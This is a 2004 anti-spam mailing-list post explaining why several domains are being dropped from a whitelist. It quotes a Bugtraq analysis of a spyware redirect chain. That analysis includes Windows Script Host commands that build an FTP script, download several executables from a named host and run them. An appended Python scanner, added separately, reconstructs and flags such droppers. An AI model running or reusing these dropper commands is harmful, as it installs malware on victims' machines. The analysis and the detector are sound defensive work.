[SURBL-Discuss] Need help checking FP list from Theo

Jeff Chan jeffc at surbl.org
Tue Sep 7 08:36:28 CEST 2004


My bad, I inadvertently included a message which was about
trojan-like spyware, which is publicly available at:

  http://seclists.org/lists/bugtraq/2004/May/0153.html

> http://65.17.207.40/framepb_1u.php
>
> which redirects to
> 
> http://si1.default-homepage-network.com/180/180.htm?si-001
> 
> which redirects to
> 
> http://object.passthison.com/vu083003/object.cgi?si1
> 
> which uses the Object Data vulnerability to change your startpage to
> 
> http://default-homepage-network.com/start.cgi?hkcu
> 
> the parameter at the end is either HKCU or HKLM depending on what
> registry branch lead you there. This serves to notify
> default-homepage-network whether your machine has been compromised with
> user or administrator privileges
> 
> start.cgi also opens a few popup windows with advertisements, after
> which it opens the following page
> 
> http://default-homepage-network.com/newspynotice.html
> 
> that wants to sell you a cure against spyware which hijacks your start
> page - as theirs just did.
> 
> That page also secretly opens
> 
> http://object.passthison.com/vu083003/newobject1.cgi
> http://69.50.139.61/hp1/hp1.htm
> http://www.achtungachtung.com/0021/index.php
> 
> newobject1.cgi executes the following commands through the Windows
> Script Host object:
> 
> wsh.Run('command /C echo open downloads.default-homepage-network.com>o',false,6);
> wsh.Run('command /C echo tmpacct>>o',false,6);
> wsh.Run('command /C echo 12345>>o',false,6);
> wsh.Run('command /C echo bin>>o',false,6);
> wsh.Run('command /C echo get install2.exe>>o',false,6);
> wsh.Run('command /C echo get infamous_downloader.exe>>o',false,6);
> wsh.Run('command /C echo get 0021-bdl94126.EXE>>o',false,6);
> wsh.Run('command /C echo get CS4P028.exe>>o',false,6);
> wsh.Run('command /C echo bye>>o',false,6);
> wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o >o.bat',false,6);
> wsh.Run('command /C echo if exist install2.exe install2.exe >>o.bat',false,6);
> wsh.Run('command /C echo if exist infamous_downloader.exe infamous_downloader.exe >>o.bat',false,6);
> wsh.Run('command /C echo if exist 0021-bdl94126.EXE 0021-bdl94126.EXE >>o.bat',false,6);
> wsh.Run('command /C echo if exist CS4P028.exe CS4P028.exe >>o.bat',false,6);
> wsh.Run('command /C o.bat',false,6);
> 
> Hp1.htm tries to exploit the Ibiza MHTML/CHM vulnerability to launch
> http://69.50.139.61/hp1/HP1.chm::/hp1.htm
> 
> framepb_1u.php also tries to open http://69.50.139.61/hp2/hp2.htm which
> uses Ibiza to launch http://69.50.139.61/hp2/hp2.chm::/hp2.htm
> 
> Other files that are attempted to be delivered are
> 
> http://www.addictivetechnologies.net/DM0/cab/emCraft1.cab
> http://www.addictivetechnologies.net/DM0/exe/emCraft1.exe
> http://validation-required.info/
> http://www.popmoney.net/ip/index.php
> http://www.portalone.hostance.com.com/italia.exe

Therefore I am taking all those domains out of the possible
whitelist.

Jeff C.
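As an added example (not from the quoted Bugtraq post or from SURBL), a small Python analyser that replays a sequence of wsh.Run('command /C echo ... >file') calls like the one quoted above, recovers the FTP script and batch file they stage on disk, and flags the pattern so a page scanner can report which host and payload names a dropper of this shape would fetch. The script sample, hostname and filenames below are constructed placeholders.

```python
import re

# Constructed sample in the shape of the quoted dropper stub; hostname and
# payload names are placeholders, and one call is line-wrapped on purpose.
SAMPLE_SCRIPT = r"""
wsh.Run('command /C echo open
downloads.example.invalid>o',false,6);
wsh.Run('command /C echo tmpacct>>o',false,6);
wsh.Run('command /C echo 12345>>o',false,6);
wsh.Run('command /C echo bin>>o',false,6);
wsh.Run('command /C echo get install2.exe>>o',false,6);
wsh.Run('command /C echo get stage2.exe>>o',false,6);
wsh.Run('command /C echo bye>>o',false,6);
wsh.Run('command /C echo if not exist %windir%\statuslog ftp -s:o >o.bat',false,6);
wsh.Run('command /C echo if exist install2.exe install2.exe >>o.bat',false,6);
wsh.Run('command /C o.bat',false,6);
"""

RUN_CALL = re.compile(r"""wsh\.Run\(\s*(['"])(.*?)\1\s*,""", re.IGNORECASE | re.DOTALL)
ECHO_REDIRECT = re.compile(r"^command\s+/C\s+echo\s+(.*?)\s*(>>?)\s*(\S+)$", re.IGNORECASE)

def reconstruct_staged_files(script: str) -> dict:
    """Replay every 'echo ... >file' / '>>file' Run call in order and return
    the lines each redirected file would hold once the script has run."""
    files = {}
    for m in RUN_CALL.finditer(script):
        cmd = " ".join(m.group(2).split())  # collapse line-wrapping whitespace
        e = ECHO_REDIRECT.match(cmd)
        if not e:
            continue
        content, op, target = e.groups()
        if op == ">":                       # single '>' truncates the file
            files[target] = []
        files.setdefault(target, []).append(content)
    return files

def find_ftp_droppers(script: str) -> list:
    """Flag a staged batch file that runs 'ftp -s:<script>' where <script> was
    itself written by the same Run sequence; report host and fetched names."""
    staged = reconstruct_staged_files(script)
    findings = []
    for name, lines in staged.items():
        for line in lines:
            fm = re.search(r"ftp\s+-s:(\S+)", line, re.IGNORECASE)
            if not fm or fm.group(1) not in staged:
                continue
            ftp_lines = staged[fm.group(1)]
            findings.append({
                "batch": name,
                "executed": bool(re.search(r"/C\s+" + re.escape(name) + r"\b", script)),
                "hosts": [l.split()[1] for l in ftp_lines if l.lower().startswith("open ")],
                "downloads": [l.split(None, 1)[1] for l in ftp_lines if l.lower().startswith("get ")],
            })
    return findings
```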